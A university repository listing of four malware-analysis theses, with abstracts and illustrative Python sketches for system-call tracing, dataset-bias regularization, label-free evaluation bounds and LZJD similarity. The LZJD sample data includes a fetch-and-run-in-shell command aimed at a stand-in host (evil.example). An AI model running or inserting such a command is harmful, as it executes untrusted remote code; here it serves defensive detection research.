Browsing by Subject "Malware Analysis"
Now showing 1 - 4 of 4
Item: Automate the tracing of Windows System Calls to identify malicious activities (2019-01-01)
Goenka, Siddhant; Nicholas, Charles; Computer Science and Electrical Engineering; Computer Science
We describe the problems posed by various malware, or malicious applications, on the Microsoft Windows Operating System. Our work focuses on automating dynamic malware analysis by intercepting Windows system calls, which helps cover a wider range of malware, including the newly evolved fileless variants. Intercepting system calls allows us to monitor malicious activity so that malicious behavior can be identified without the manual effort of disassembling binaries. The results show how our work can help automate the process of API hooking for the open-source community to detect Byzantine behaviors, rather than focusing on improving the detection mechanism itself.

Item: Detecting, Quantifying, and Mitigating Bias in Malware Datasets (2020-01-20)
Seymour III, John Jefferson; Nicholas, Charles K; Computer Science and Electrical Engineering; Computer Science
The effectiveness of a malware classifier on new data is tightly coupled with the data on which it was trained and validated. Malware data are collected from various sources, which must be trusted to provide correct labels and to be independent and identically distributed (i.i.d.). However, little research exists on how well this assumption holds in practice. Given data from various sources of unknown quality, what can we know about a malware classifier's ability to generalize to future, unseen data? Can we even create a malware classifier that generalizes, given issues of data quality and concept drift? How can we assure others that our malware classifier doesn't have underlying data quality issues? This dissertation describes the labeling of a massive dataset of over 33 million raw malware samples so that it can be used both for classification of malware families and as a baseline against which to measure drift. It then demonstrates that the models from multiple prior studies are highly sensitive to drift. Finally, it tests new regularization methods that explicitly use the source of the data to penalize features which do not generalize from one dataset to another.
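The first item above describes automating dynamic analysis by intercepting Windows system calls through API hooking. The abstract does not name a hooking framework, so the hooking layer itself is not shown here; the sketch below only illustrates the identification step, scanning a hypothetical per-process call trace for a classic remote-injection sequence. The call names, PIDs, and pattern are assumptions made for illustration, not the thesis's implementation.

```python
# Illustrative only: once system calls have been intercepted (e.g. by hooking
# ntdll stubs), the resulting per-process trace can be scanned for well-known
# malicious sequences. Trace contents and the pattern below are hypothetical.
from collections import defaultdict

# A hypothetical trace as emitted by a hooking layer: (pid, system call name).
trace = [
    (101, "NtOpenProcess"),
    (101, "NtAllocateVirtualMemory"),
    (101, "NtWriteVirtualMemory"),
    (204, "NtCreateFile"),
    (101, "NtCreateThreadEx"),
]

# A classic remote code injection pattern: open a victim process, allocate
# memory in it, write a payload, then start a remote thread.
INJECTION_PATTERN = [
    "NtOpenProcess",
    "NtAllocateVirtualMemory",
    "NtWriteVirtualMemory",
    "NtCreateThreadEx",
]

def contains_subsequence(calls, pattern):
    """True if `pattern` occurs in `calls` in order (other calls may interleave)."""
    it = iter(calls)
    return all(any(c == p for c in it) for p in pattern)

by_pid = defaultdict(list)
for pid, call in trace:
    by_pid[pid].append(call)

for pid, calls in by_pid.items():
    if contains_subsequence(calls, INJECTION_PATTERN):
        print(f"pid {pid}: remote-injection-like system call sequence detected")
```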
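The second item mentions regularization that uses the source of the data to penalize features which do not generalize. As a rough illustration of that idea, and not the dissertation's exact formulation, the toy sketch below trains a logistic regression whose L2 penalty on each feature is weighted by how much that feature's distribution differs between two synthetic sources; all data and parameters are invented.

```python
# Toy sketch of one plausible form of source-aware regularization: features
# whose distribution differs sharply between data sources receive a heavier
# L2 penalty, nudging the classifier toward features that look stable across
# sources. Synthetic data only; not the dissertation's formulation.
import numpy as np

rng = np.random.default_rng(0)
n, d = 500, 5

# Two synthetic "sources". Feature 4 is shifted in source B and only predicts
# the label in source A, i.e. it does not generalize across sources.
X_a = rng.normal(0.0, 1.0, (n, d))
X_b = rng.normal(0.0, 1.0, (n, d))
X_b[:, 4] += 3.0
y_a = (X_a[:, 0] + X_a[:, 4] > 0).astype(float)
y_b = (X_b[:, 0] > 0).astype(float)

X = np.vstack([X_a, X_b])
y = np.concatenate([y_a, y_b])

# Per-feature divergence between the two sources (difference of means,
# scaled by the pooled standard deviation).
div = np.abs(X_a.mean(0) - X_b.mean(0)) / (X.std(0) + 1e-8)

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

# Logistic regression with a divergence-weighted L2 penalty: the gradient of
# the penalty term lam * sum_j div_j * w_j**2 is 2 * lam * div * w.
w, lam, lr = np.zeros(d), 0.5, 0.1
for _ in range(3000):
    p = sigmoid(X @ w)
    grad = X.T @ (p - y) / len(y) + 2 * lam * div * w
    w -= lr * grad

print("cross-source divergence per feature:", np.round(div, 2))
print("learned weights:                    ", np.round(w, 2))
```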
Item: Evaluating Automatic Malware Classifiers in the Absence of Reference Labels (2020-01-01)
Joyce, Robert J; Nicholas, Charles; Computer Science and Electrical Engineering; Computer Science
The malware analysis community is completely devoid of a diverse, up-to-date reference dataset with ground truth labels. Consequently, automatic malware classifiers are typically evaluated using custom datasets with near-ground-truth labels. However, classifier evaluation using near-ground-truth labels can yield erroneous or biased results. We propose an alternative classifier evaluation framework that does not require reference labels. We introduce the concept of a ground truth refinement and propose potential methods for constructing an approximation of one from a malware dataset. We prove that, using a ground truth refinement, it is possible to compute lower bounds on precision and error rate as well as upper bounds on recall and accuracy without requiring ground truth reference labels. We perform a case study on the popular AVClass malware labeler using our proposed evaluation framework.

Item: Identifying Malicious Source Code Using LZJD (2021-01-01)
Roca, Alexander James; Nicholas, Charles; Computer Science and Electrical Engineering; Computer Science
This work presents a proof of concept for using the Lempel-Ziv Jaccard Distance, or LZJD, to detect malicious source code by comparing suspect source code against a library of known malicious source code. In this paper we detail our method of making these comparisons, evaluate how well it works, and suggest potential improvements for future work. We conclude that LZJD does appear to be effective at identifying similar files, but that it struggles when the scores are aggregated to compare entire source code projects.
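To make the ground truth refinement idea from the third item concrete, the simplified sketch below assumes each refinement group contains samples known to share one (unknown) true family, for example near-duplicate binaries. Any disagreement among predicted labels inside such a group is then a certain error, which yields a lower bound on error rate and an upper bound on accuracy. The sample names and family labels are hypothetical, and this is a simplified illustration rather than the paper's exact construction or proofs.

```python
# Simplified illustration of how a ground truth refinement can bound error
# without reference labels. Assumption: each refinement group is a set of
# samples guaranteed to share one (unknown) true family.
from collections import Counter

# Predicted family label per sample (hypothetical classifier output).
predicted = {
    "s1": "emotet", "s2": "emotet", "s3": "zeus",    # group A
    "s4": "zeus",   "s5": "zeus",                    # group B
    "s6": "ramnit", "s7": "emotet",                  # group C
}

# Refinement: groups of samples known to share a true (but unknown) family.
refinement = [["s1", "s2", "s3"], ["s4", "s5"], ["s6", "s7"]]

min_errors = 0
for group in refinement:
    labels = Counter(predicted[s] for s in group)
    # All members share one true label, so at most the most common predicted
    # label within the group can be correct; the rest are certainly errors.
    min_errors += len(group) - max(labels.values())

n = len(predicted)
print(f"error rate >= {min_errors / n:.2f}")       # lower bound on error rate
print(f"accuracy   <= {1 - min_errors / n:.2f}")   # corresponding upper bound
```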
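The final item compares suspect source code against a library of known malicious code using LZJD. The sketch below shows the underlying idea: build a Lempel-Ziv set of phrases for each file and take the Jaccard distance between the sets. Production LZJD implementations min-hash these sets for speed; this exact version and the tiny in-memory "library" are only for illustration.

```python
# Minimal sketch of the idea behind LZJD: compare Lempel-Ziv phrase sets with
# Jaccard distance. Example inputs below are invented.
def lz_set(data: bytes) -> set:
    """LZ78-style parsing: record each substring the first time it is seen."""
    phrases, current = set(), b""
    for byte in data:
        current += bytes([byte])
        if current not in phrases:
            phrases.add(current)
            current = b""
    return phrases

def lzjd(a: bytes, b: bytes) -> float:
    """Lempel-Ziv Jaccard Distance: 0.0 means identical phrase sets."""
    sa, sb = lz_set(a), lz_set(b)
    return 1.0 - len(sa & sb) / len(sa | sb)

# Hypothetical usage: rank a suspect source file against known malicious samples.
suspect = b"import os\nos.system('curl evil.example | sh')\n"
library = {
    "dropper.py": b"import os\nos.system('curl evil.example | sh')  # variant\n",
    "hello.py":   b"print('hello world')\n",
}
for name, blob in sorted(library.items(), key=lambda kv: lzjd(suspect, kv[1])):
    print(f"{name}: distance {lzjd(suspect, blob):.3f}")
```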